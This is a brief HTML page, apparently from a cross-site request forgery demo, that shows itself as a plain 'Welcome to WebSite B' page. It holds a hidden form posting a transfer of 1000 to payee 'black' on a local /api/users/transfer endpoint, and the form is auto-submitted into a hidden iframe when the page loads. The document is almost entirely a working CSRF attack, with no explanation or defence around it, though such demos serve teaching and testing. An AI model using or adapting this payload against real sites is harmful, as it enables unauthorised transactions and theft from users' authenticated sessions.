<!DOCTYPE html>
<html>
  <head>
    <title>Web B</title>
    <link rel="stylesheet" href="/stylesheets/style.css" />
  </head>
  <body>
    <h2>Welcome to WebSite B</h2>

    <form name="form" target="csrf" method="post" action="http://127.0.0.1:6001/api/users/transfer">
      <input name="payee" type="hidden" value="black">
      <input name="amount" type="hidden" value="1000">
    </form>
  </body>

  <script>
			const iframe = document.createElement('iframe');
			iframe.name = 'csrf';
			iframe.style.display = 'none';
			document.body.appendChild(iframe);

			setTimeout(() => {
				document.querySelector('[name=form]').submit();
			}, 1000);
  </script>
</html>
